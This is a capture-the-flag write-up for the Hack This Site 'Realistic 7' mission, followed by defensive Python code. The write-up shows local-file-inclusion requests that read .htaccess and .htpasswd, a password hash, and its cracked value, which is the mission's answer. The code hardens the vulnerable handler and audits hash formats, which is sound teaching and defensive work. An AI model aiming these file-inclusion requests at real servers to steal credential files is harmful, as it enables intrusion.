What is it? @.@

Here is the place where I record some tactics for wargames, systems, and other security issues.

2012-09-28

Hack This Site! - Realistic 7

Description:
What's Right For America
A homophobic hate group is spreading their conservative propaganda of blind obedience and bigoted war mongering. Help tolerance activists take over their website of ignorance and discrimination. 

Level 7
From: FreedomOfChoice 

Message: Friend of freedom and liberty, I invite you to take a look at the hate speech being spewed over the web at http://www.hackthissite.org/missions/realistic/7/. It's so funny that conservatives keep saying they want to protect the values of America - freedom, tolerance, and democracy - but when it comes to personal choices like private marijuana use or same-sex marriages, they damn them to burn in eternal hell and send them to jail.
This is a personal freedom issue. No one else is hurt if two consenting adults decide to marry. But people who claim to have the moral high ground decide to ruin it for everyone else and discriminate against same-sex couples. To think that they are talking about making a constitutional amendment to STOP OUR FREEDOM TO MARRY is ludicrous. This injustice must be stopped.
There is an admin section on that website somewhere, perhaps hidden among their directory structure. It would be a great fight against moral tyranny and a victory for freedom if you could somehow hack into their website. Thank you.
Solution:
  1. Take a tour of the website.
  2. The hint "There is an admin section on that website somewhere, perhaps hidden among their directory structure." tells us there is a directory named "admin", so maybe we can use "directory indexing" to discover what is inside the website.
  3. If you observe the URLs of the website, you can see that its content is displayed by including files named in a URL parameter, which means there is a Remote/Local File Inclusion (also known as RFI/LFI) vulnerability.
    Reference: http://en.wikipedia.org/wiki/Remote_file_inclusion
    Vul: hxxp://www.hackthissite.org/missions/realistic/7/showimages.php?file=patriot.txt
    Vul: hxxp://www.hackthissite.org/missions/realistic/7/showimages.php?file=bush.txt
    Vul: hxxp://www.hackthissite.org/missions/realistic/7/showimages.php?file=war.txt
  4. Let's check the files. There are a few image links like below.
    Link: hxxp://www.hackthissite.org/missions/realistic/7/war.txt

    Content:
    images/war1.jpg
    images/war2.jpg
    images/war3.jpg
  5. Let's try directory indexing on the "images" directory; there you'll find the "admin" directory.
    Link: hxxp://www.hackthissite.org/missions/realistic/7/images/

  6. Visiting hxxp://www.hackthissite.org/missions/realistic/7/images/admin/ prompts for HTTP (Basic) authentication.
    Reference: http://en.wikipedia.org/wiki/Basic_access_authentication
  7. Naturally, let's use the LFI to read the content of the .htaccess file.
    Reference: http://en.wikipedia.org/wiki/Htaccess

    view-source:hxxp://www.hackthissite.org/missions/realistic/7/showimages.php?file=images/admin/.htaccess
  8. The page source then shows the .htaccess content, wrapped line by line into image tags like below.
    <center><a href="AuthName "Administration Access"
    "><img src="AuthName "Administration Access"
    " width=100></a> <a href="AuthType Basic
    "><img src="AuthType Basic
    " width=100></a> <a href="AuthUserFile /usr/local/www/hackthissite.org/html/missions/realistic/7/images/admin/.htpasswd
    "><img src="AuthUserFile /usr/local/www/hackthissite.org/html/missions/realistic/7/images/admin/.htpasswd
    " width=100></a> <a href="require valid-user
    "><img src="require valid-user
    " width=100></a> <a href=""><img src="" width=100></a> </center>
  9. Let's check the file named ".htpasswd".
    Reference: http://en.wikipedia.org/wiki/.htpasswd

    view-source:hxxp://www.hackthissite.org/missions/realistic/7/showimages.php?file=images/admin/.htpasswd
  10. Here is what we want.
    administrator:$1$AAODv...$gXPqGkIO3Cu6dnclE/sok1
  11. I use "john the ripper" to crack it.
    Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 4x])
    shadow           (administrator)
  12. Good Job, OOXXOOXX, You have sucessfully completed Mission 7.
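The two weaknesses this mission chains together are a file parameter handed straight to a file-reading call (steps 3 and 7) and a web-reachable .htpasswd holding an MD5-crypt hash that john recovers quickly (steps 10 and 11). The Python below is an added example, not code from the mission or from hackthissite.org: it shows how a hardened version of the showimages.php-style handler would confine the "file" parameter to the .txt lists it is meant to serve, and how a small audit of .htpasswd hash formats flags the legacy $1$ scheme. The directory layout, file contents and the hash values are constructed for the demo (the administrator hash is a placeholder, not the one from the mission), and the assumption that the handler only ever needs plain .txt lists in its own directory is mine.

```python
"""Hardened counterpart of the showimages.php?file=... pattern, plus a small
.htpasswd hash-format audit. Added example; all sample data is constructed."""
import re
import tempfile
from pathlib import Path

# ---- 1. Confining the "file" parameter --------------------------------------
# Assumption: the handler only serves .txt image lists that live directly in
# its own directory (patriot.txt, bush.txt, war.txt in the write-up).
LIST_NAME = re.compile(r"[A-Za-z0-9_-]+\.txt")


def resolve_list_file(base_dir: str, requested: str) -> Path:
    """Return the on-disk path for `requested`, or raise ValueError.

    Two independent checks: a syntactic allowlist on the raw parameter, then a
    canonical-path check that the resolved file still sits directly in base_dir.
    Dotfiles (.htaccess, .htpasswd), subdirectories and '..' fail the first
    check; the second catches anything the first might miss (e.g. symlinks)."""
    if not LIST_NAME.fullmatch(requested):
        raise ValueError(f"rejected by allowlist: {requested!r}")
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()
    if candidate.parent != base:
        raise ValueError(f"escapes base directory: {requested!r}")
    if not candidate.is_file():
        raise FileNotFoundError(requested)
    return candidate


def load_image_list(base_dir: str, requested: str) -> list:
    """Read the list and keep only entries that point into images/ (no traversal)."""
    text = resolve_list_file(base_dir, requested).read_text()
    return [ln.strip() for ln in text.splitlines()
            if re.fullmatch(r"images/[A-Za-z0-9_-]+\.(jpg|png|gif)", ln.strip())]


# ---- 2. Auditing .htpasswd hash formats --------------------------------------
# Prefix -> (scheme name, considered weak). MD5-crypt ($1$) and apr1 are fast
# to brute-force, which is exactly why john recovers them in the write-up.
SCHEMES = [
    ("$2y$", "bcrypt", False), ("$2b$", "bcrypt", False), ("$2a$", "bcrypt", False),
    ("$apr1$", "apr1 (Apache MD5)", True), ("$1$", "MD5-crypt", True),
    ("{SHA}", "SHA-1", True),
]


def audit_htpasswd(text: str) -> list:
    """Return (user, scheme, weak) per entry; unknown prefixes are treated as weak."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, _, digest = line.partition(":")
        scheme, weak = "crypt(3)/unknown", True
        for prefix, name, is_weak in SCHEMES:
            if digest.startswith(prefix):
                scheme, weak = name, is_weak
                break
        findings.append((user, scheme, weak))
    return findings


# ---- 3. Constructed demo tree mirroring the write-up's layout ----------------
# Constructed sample data: names follow the mission, contents are made up.
CONSTRUCTED_HTPASSWD = (
    "administrator:$1$saltsalt$00000000000000000000000\n"  # placeholder hash, not the real one
    "editor:$2y$10$abcdefghijklmnopqrstuuABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\n"
)


def build_demo_tree() -> str:
    root = Path(tempfile.mkdtemp(prefix="r7demo_"))
    (root / "war.txt").write_text("images/war1.jpg\nimages/war2.jpg\n../../etc/passwd\n")
    admin = root / "images" / "admin"
    admin.mkdir(parents=True)
    (admin / ".htpasswd").write_text(CONSTRUCTED_HTPASSWD)
    return str(root)


def try_resolve(base_dir: str, requested: str) -> bool:
    """True if the request would be served, False if the hardened handler refuses."""
    try:
        resolve_list_file(base_dir, requested)
        return True
    except (ValueError, FileNotFoundError):
        return False


def demo() -> dict:
    """Run every check against the constructed tree and return the results."""
    root = build_demo_tree()
    probes = ["war.txt", "images/admin/.htpasswd", "../war.txt", ".htaccess"]
    return {
        "served": {r: try_resolve(root, r) for r in probes},
        "images": load_image_list(root, "war.txt"),
        "audit": audit_htpasswd(CONSTRUCTED_HTPASSWD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The allowlist does the real work; the canonical-path comparison is defence in depth so that a later change to the regex cannot silently reopen the traversal. The audit is only a format check: keeping .htpasswd outside the document root (or denying it in the server config) matters as much as the hash scheme, because no hash scheme helps once the file can be read through the very handler it protects.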